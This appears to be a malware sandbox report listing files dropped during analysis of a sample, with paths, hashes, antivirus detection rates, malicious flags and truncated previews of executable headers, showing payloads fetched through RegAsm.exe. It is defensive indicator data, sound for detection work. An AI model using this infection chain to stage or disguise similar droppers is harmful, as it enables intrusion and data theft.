Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................<..........~Z... ...`....@.. ..............................1H....`.................................$Z..W....`...............H..(&...........X............................................... ............... ..H............text....:... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............F..............@..B................`Z......H........L..,............................................................^3..]....B..3..H1^.`aV..j.(X..`.vK)..gA.W....}<..<L........%..}x.31.t.r.:.]...a#..!.U..q....1~..@.....X.(......Lj..D....A......D.w.k.s...E&...L:......i....AD.l..;..8.V....P.VZo.$.~..:....k.....i.......ho........lb.DB.O..I.v.Ks".[.IO..X.2$q.......3..f........a..X.;..(..8f..j.#.k..g.g...P.%......<A.E.b...!.]UH~...0aY.}....!>....M.../&.K'.....N..._.C6.h. z.j......o...F5...`.!.d"p.%..

C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8684256
Entropy (8bit):	7.036585407539768
Encrypted:	false
SSDEEP:	98304:yvOB51QmIWth3e1PTbEYBkQyShbkqdwOyAuYJvdVuWFY:y+51/Iqh3e1PTbE7QbCqeYbM8
MD5:	B5887A19FE50BFA32B524AAAD0A453BC
SHA1:	CD1F3905959CD596C83730A5B03CEEF4E9F2A877
SHA-256:	FCE5CBEEC1EB5274FC3AFA55E57FB2F724688CB9D4661A8A86716011493564C7
SHA-512:	5B9914C94101B53314B14335E687552E5DA0A4085AFB826AE94F45769E9B1E66A35624B6E6B60257514F4ADF2ACC5C9E048BFA3A24AAFB891D203E3011C02538
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....P..............................&... ...@....@.. ....................... ......I.....@..................................&..K....`.............................6&............................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc.......`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	5.3554278163807965
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:MLU84qpE4KlKDE4KhKiKhIE4Ks
MD5:	8378C2E2DA2FDD2FB813AA6E18705667
SHA1:	EFA4CF7D0E19099EB95C3BCA32F6A5D111BFFF30
SHA-256:	C12EA9B40BA290B624BB2DDAFD4CB2CDC1C05AE1F5F142899D53CF9C54DFFA06
SHA-512:	69C0E61617DFD6F843ECBA8D9328D6737BADAFB622236D3AC79E03590AFAFC5523E10D5E52AD8ACABD71EF9F4B202A654A386E1DF799CC9219CA4678145CDFDD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DSN_5xuwaC5nkP_MHzd7lLTl.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ExtreamFanV6.exe.log

Download File

Process:	C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	5.3554278163807965
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:MLU84qpE4KlKDE4KhKiKhIE4Ks
MD5:	8378C2E2DA2FDD2FB813AA6E18705667
SHA1:	EFA4CF7D0E19099EB95C3BCA32F6A5D111BFFF30
SHA-256:	C12EA9B40BA290B624BB2DDAFD4CB2CDC1C05AE1F5F142899D53CF9C54DFFA06
SHA-512:	69C0E61617DFD6F843ECBA8D9328D6737BADAFB622236D3AC79E03590AFAFC5523E10D5E52AD8ACABD71EF9F4B202A654A386E1DF799CC9219CA4678145CDFDD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FileApp.exe.log

Download File

Process:	C:\Users\user\Desktop\FileApp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZYgCMtJP3wxddinn5Sa3IKJH.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jewkkwnf.exe.log

Download File

Process:	C:\ProgramData\jewkkwnf\jewkkwnf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	5.3554278163807965
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:MLU84qpE4KlKDE4KhKiKhIE4Ks
MD5:	8378C2E2DA2FDD2FB813AA6E18705667
SHA1:	EFA4CF7D0E19099EB95C3BCA32F6A5D111BFFF30
SHA-256:	C12EA9B40BA290B624BB2DDAFD4CB2CDC1C05AE1F5F142899D53CF9C54DFFA06
SHA-512:	69C0E61617DFD6F843ECBA8D9328D6737BADAFB622236D3AC79E03590AFAFC5523E10D5E52AD8ACABD71EF9F4B202A654A386E1DF799CC9219CA4678145CDFDD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pO77aCusXJv6mYqR0srms9ou.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xNc0eiwaHinah8TaPUA3TuXZ.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10902016
Entropy (8bit):	7.966543494488889
Encrypted:	false
SSDEEP:	196608:+Oix0DABAAtXftiAf6xz1Z5PVm6Gcj+TqnC6fOaSz/n2EgfY0gEMtw1:QOcXfC7bE9fjCfY0gg
MD5:	025EBE0A476FE1A27749E6DA0EEA724F
SHA1:	FE844380280463B927B9368F9EACE55EB97BAAB7
SHA-256:	2A51D50F42494C6AB6027DBD35F8861BDD6FE1551F5FB30BF10138619F4BC4B2
SHA-512:	5F2B40713CC4C54098DA46F390BBEB0AC2FC0C0872C7FBDFDCA26AB087C81FF0144B89347040CC93E35B5E5DD5DC102DB28737BAEA616183BEF4CAECEBFB9799
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...0..f..........#.................o..........@.......................................... ....................................................<...........@S..`*..........................................P...(....R..8............ .. ............................text............................... ..`.rdata.. ...........................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...:(......................... ..`.text1..X.... ......................@....text2...M...0...N..................`..h.rsrc................T..............@..@........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1760552
Entropy (8bit):	7.909438005215774
Encrypted:	false
SSDEEP:	49152:eo2sTMKEpK0Y6d84LE1pM5bK0dRfBp8N6eopiaj7EvwtCpLdiXr9fpJ2M67:l2sTMKEpK0Y6dTE1pM5bK0dRfBp8N6eL
MD5:	1959CE1E98B798963F8B7D04BFB71E69
SHA1:	3F2FB337CA2F2686E55B985E1F4020E2273BC5A8
SHA-256:	D480B6EFCF1CCDC3A7CF4C1D22839E27E9701758B19C0A197B049B66BDCFE870
SHA-512:	8E736A00B4077D32E11C6AE100D4148033C5B6BDBB2A874F707C3315DB5AC61798CC310198AAC97F4C29AE04F45D34E0A2D45A57CB43BD5536E7F3199ADD3E8C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%46........PE..L.....GO.................p....>..B...8............@..........................pL...........@.................................4........0G............. ....Q....?.H....................................................................................text....o.......p.................. ..`.rdata..b.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc........0G.....................@..@.reloc...2...0L..4..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	320512
Entropy (8bit):	7.985351724503873
Encrypted:	false
SSDEEP:	6144:tSS+SfXno/QxiNbuW22FoiU4eAy9i3nzbtvNDNsw:99PqBuW2dHwHxNDNsw
MD5:	6B19E5C100DB0812FFB7813A1503C05D
SHA1:	17032C0B1B056BEC3F23786BAD5AA17404DE3297
SHA-256:	516B1A67A3AAFCEADFF083854B26512174CBED4D455C5D8F8993ACC8A895EA2E
SHA-512:	FB97BD74AAE13CB4D0205CF704300DFC4F0678DCBD07AACC295BC13B666A4BFF46F12786C2D37702A7A783E786A6A92DF31DF37A39EBCAEE74D46C58E0C4E27C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .f............................~.... ........@.. .......................@.......l....`.................................$...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H...........,...........................................................,....p`.=(..B.1......V.A.Lf......pE?..'.v.kz.G/OL...*.8OO.5.0RS...p..J....$..n\|..^..v..\|}.T.[cr$kAw....k\|.lP2...........U.6f$.o.k....IM........J......01....~.....h~.....Y....r.:/....[0..c..A.]....cE.z4....RG.G.....\|.(EYJ.e.~...h...X...v..%..6...}....O.}.<:.....L.A.`.c..3...!..]./.}p...8...@LB.>..Nh.>!i.Z.....0}. .o..#...6..:<..0pm~:aL..q..`...[k..Tj...@(..'.. ...`.D5..._.{...1..O.9l...S.K.k.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	528896
Entropy (8bit):	7.995705966316978
Encrypted:	true
SSDEEP:	12288:HiI9LiGtFBsoR1UJdFpzz0b+fzV4ULweVBBP0bK4WHL/Ff5qTkfozd:HieFBXRqJDpzE+LVfXVkbK4WlAvd
MD5:	D8ECB462D3046A0EE172551C5D505C8E
SHA1:	54F9E16B497579964E9AFC90C3C0C208F16B4418
SHA-256:	AFB9EDBF499A4726D798CDA9F0F372B4B1019033B68D5EB87A8A83ECB7463D6F
SHA-512:	9EED44C24A71B44E90EFC853B75D2103FAA3F8518E1EFAD45C8C4733EE0396C51E8EA11BA6E7D2AC4F30234E6380C3325227CCED8D1753373581EB45073C012E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................`.................................t'..W....@.......................`......<&............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H...........l............................................................&f..;.JJ.s}./...1.l.2E..a.....}.py..xzZ.@l....{C.$.t....9sK........n...~...M[P...TBNi.#.}.j.}.S@kr.#..G.B.^.......}......T1..#..'..cQb6..k;.1..^.&.D.;....kXS.x.NTE.(/.h.....1..2+5..Pv...@...../=..?Q..,.....v7p...#d....a..8.y.......m.~Cs...N1y...0.i...9...E...>V.Q......Z.?M\..2]7..)Z".`=.Q.yF.....A3........j1j....=.e..NA.2...6....RC../cQ.0...$.OS..+.ZA}B....hMs.....p....z.....w$R..H.L...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	290344
Entropy (8bit):	7.980772850522231
Encrypted:	false
SSDEEP:	6144:UmCasy4lZs8PdTTuC9RKXAmlxp5T9iynBw496NlRlEO:UCsVs8lThUBxp6+n9YRlEO
MD5:	6F99968CC27D2D6A07A921AB703A5D5D
SHA1:	1B1F72A9CA325B2D7B01F66AE1EBEF646B167EC0
SHA-256:	5EF282479F0C6F082F15D3F878F8C4B418259EBC6D7941A472E0F28CDCC43C88
SHA-512:	3EA9CBBB6AB281C02AEF8473F40EC00412A05B613D4A45E228E06F4A585AE25BA35DC2EB2A772CF9AB38E86A05B67A4388B4EF306483EF030666D1C242BA370A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................<..........~Z... ...`....@.. ..............................1H....`.................................$Z..W....`...............H..(&...........X............................................... ............... ..H............text....:... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............F..............@..B................`Z......H........L..,............................................................^3..]....B..3..H1^.`aV..j.(X..`.vK)..gA.W....}<..<L........%..}x.31.t.r.:.]...a#..!.U..q....1~..@.....X.(......Lj..D....A......D.w.k.s...E&...L:......i....AD.l..;..8.V....P.VZo.$.~..:....k.....i.......ho........lb.DB.O..I.v.Ks".[.IO..X.2$q.......3..f........a..X.;..(..8f..j.#.k..g.g...P.%......<A.E.b...!.]UH~...0aY.}....!>....M.../&.K'.....N..._.C6.h. z.j......o...F5...`.!.d"p.%..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	290344
Entropy (8bit):	7.980772850522231
Encrypted:	false
SSDEEP:	6144:UmCasy4lZs8PdTTuC9RKXAmlxp5T9iynBw496NlRlEO:UCsVs8lThUBxp6+n9YRlEO
MD5:	6F99968CC27D2D6A07A921AB703A5D5D
SHA1:	1B1F72A9CA325B2D7B01F66AE1EBEF646B167EC0
SHA-256:	5EF282479F0C6F082F15D3F878F8C4B418259EBC6D7941A472E0F28CDCC43C88
SHA-512:	3EA9CBBB6AB281C02AEF8473F40EC00412A05B613D4A45E228E06F4A585AE25BA35DC2EB2A772CF9AB38E86A05B67A4388B4EF306483EF030666D1C242BA370A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................<..........~Z... ...`....@.. ..............................1H....`.................................$Z..W....`...............H..(&...........X............................................... ............... ..H............text....:... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............F..............@..B................`Z......H........L..,............................................................^3..]....B..3..H1^.`aV..j.(X..`.vK)..gA.W....}<..<L........%..}x.31.t.r.:.]...a#..!.U..q....1~..@.....X.(......Lj..D....A......D.w.k.s...E&...L:......i....AD.l..;..8.V....P.VZo.$.~..:....k.....i.......ho........lb.DB.O..I.v.Ks".[.IO..X.2$q.......3..f........a..X.;..(..8f..j.#.k..g.g...P.%......<A.E.b...!.]UH~...0aY.}....!>....M.../&.K'.....N..._.C6.h. z.j......o...F5...`.!.d"p.%..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342568
Entropy (8bit):	7.985380404862572
Encrypted:	false
SSDEEP:	6144:0C64X+qCBZeXyHC4/b9SvOu0d6C8fFsvzso5iYpCpLKHsqtbNEO:0C64X+BBpC2b8OuqwFOsO5wlKHsqtbNt
MD5:	5CDADA1CDA3C68A8CA61405458E1E587
SHA1:	5E481E20B637BD39D25057FA026DAAAD72BD1ACE
SHA-256:	10B87FC523E14C20DD6A13F1EDE571D84F7A760052F6D63B6DEB992C4B76F1ED
SHA-512:	F3D4F8423B43E32AF48E2CED88C26F29E4A78D998D3886843D2C4D0C7F3AC9638E57A34CDC50E833030D649F1509242FB176079C29DA7E837FA937D5A27E688B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................~&... ...@....@.. ...................................`.................................$&..W....@..................(&...`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`&......H...........,............................................................`pN.7....n.....Q.......d.e..$[....A..B......C.U1..#.^..........5......6i.%....^Ea9..[.......ct...q...Z.;..6.z.[^..X.'./......VHW,..w]..~5..".O.x...2.`....b..2.X.>=\.l.....#..x.S..,.~.,"...z.<...c.Z....m%}R......?G.9.X.....s$..........F.L.....@\{..J...~\.T.@C....:........q......n........z..l......X3. ...k...$.Dq.4....5?......b....__c.83..j......l.'..Z..{e."7.I.'.......j...T..:./.J.Q.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\download[1].txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.323231428797621
Encrypted:	false
SSDEEP:	3:0MXAG3z:0MQG
MD5:	42C939D0BA4BBDC4C7EAB1B5C34AAF71
SHA1:	5B0F43AB04980A7808A695BE06F2B94BEB2423EF
SHA-256:	7C040F8633B8823D72ED63DA9B3B2DFE9846E912C66A64C9433EC9C4815D76C2
SHA-512:	6EA7049F426EC3BF96B717E3A7387F2E09D53716B2C1A332ED135FAFD46F4365BF2B59F6E5E23B9959E8DAFF9C2BA2FB3F9CF2D0B174B71019578F36935AE1FE
Malicious:	false
Reputation:	unknown
Preview:	Redirecting....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

